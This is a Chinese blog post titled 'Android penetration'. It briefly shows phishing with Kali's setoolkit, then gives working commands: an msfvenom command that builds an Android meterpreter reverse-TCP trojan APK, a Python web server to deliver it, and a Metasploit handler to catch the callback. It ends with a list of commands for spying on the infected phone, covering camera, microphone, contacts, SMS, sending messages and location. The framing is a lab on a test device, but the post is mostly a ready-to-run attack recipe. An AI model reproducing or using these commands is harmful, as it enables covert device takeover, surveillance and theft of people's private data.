安卓渗透

简介: 安卓渗透

网络钓鱼(Phishing,与钓鱼的英语fishing发音相近,又名钓鱼法或钓鱼式攻击)是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息)的一种攻击方式。

这里我采用  URL 链接来作为演示。

使用kali自带的setoolkit

可以看到当你在右边输入内容搜索时,左边的监控会自动获取你的内容。

系统
IP
作用

kali

192.168.43.187 攻击机
华为
192.168.43.117
试验机

kali生成apk 木马

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.187 lport=6666 R > /root/test.apk
-p  指定攻击类型
lhost kali ip
lport 监听端口

640.png

手机获取木马

# kali 开启web页面
python -m SimpleHTTPServer 80

手机浏览器输入 ip

精彩的地方开始了

启动渗透框架

msfdb run
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.43.187
set lport 6666
exploit
# 手机可用命令
help 帮助命令
webcam_list 查看摄像头
webcam_snap 1/2 前后摄像头拍照
webcam_stream 1 录视频
record_mic  录音
check_root 检测root权限
dump_contacts 导出联系人
dump_sms 导出短信记录
send_sms -d xxxxxxxx -t "内容"  发送信息
geolocate 定位

虽然现在大部分安卓手机内核比较高,木马兼容性不是很高,但有人只要是想搞破坏,他会利用其他工具对木马进行加强




相关文章
|
8月前
|
Android开发 数据安全/隐私保护 iOS开发
安卓与iOS系统的发展趋势与比较分析
【2月更文挑战第6天】 在移动互联网时代,安卓和iOS系统作为两大主流移动操作系统,各自呈现出不同的发展趋势。本文将从技术角度出发,对安卓和iOS系统的发展方向、特点及未来趋势进行比较分析,以期为读者提供更深入的了解和思考。
125 4
|
7月前
|
安全 Android开发 iOS开发
安卓与iOS的较量:从用户体验到系统安全
在移动操作系统的战场上,安卓和iOS一直是两大巨头。它们各自拥有独特的优势和特点,吸引了大量的用户。本文将从用户体验、系统安全和应用生态等方面对安卓和iOS进行深入的比较和分析,揭示它们之间的差异和竞争关系。
85 0
|
8月前
|
人工智能 vr&ar Android开发
探索安卓与iOS系统的发展趋势
【2月更文挑战第9天】 过去,人们对于安卓和iOS系统的争论主要集中在性能、用户体验和生态系统的比较上。然而,随着移动互联网的快速发展,两大操作系统在人工智能、物联网、安全性等方面的发展趋势也备受关注。本文将探讨安卓与iOS系统在技术发展方面的差异以及未来的发展趋势。
|
Java 编译器 开发工具
安卓逆向系列篇:安卓工具总结(一)
安卓逆向系列篇:安卓工具总结
136 0
安卓逆向系列篇:安卓工具总结(一)
|
数据可视化 安全 Java
安卓逆向系列篇:安卓工具总结(二)
安卓逆向系列篇:安卓工具总结
1263 0
安卓逆向系列篇:安卓工具总结(二)
|
存储 安全 Java
安卓逆向系列篇:安卓工具总结(三)
安卓逆向系列篇:安卓工具总结
540 0
安卓逆向系列篇:安卓工具总结(三)
|
监控 安全 Android开发
安卓木马的生成
安卓木马的生成
|
存储 人工智能 安全
复旦教授报告400多个安卓漏洞,能让所有安卓机变板砖,谷歌花16个月才修复完
大概所有安卓用户都不会想到,自己手机原来这么危险。
207 0
复旦教授报告400多个安卓漏洞,能让所有安卓机变板砖,谷歌花16个月才修复完
|
安全 Linux 调度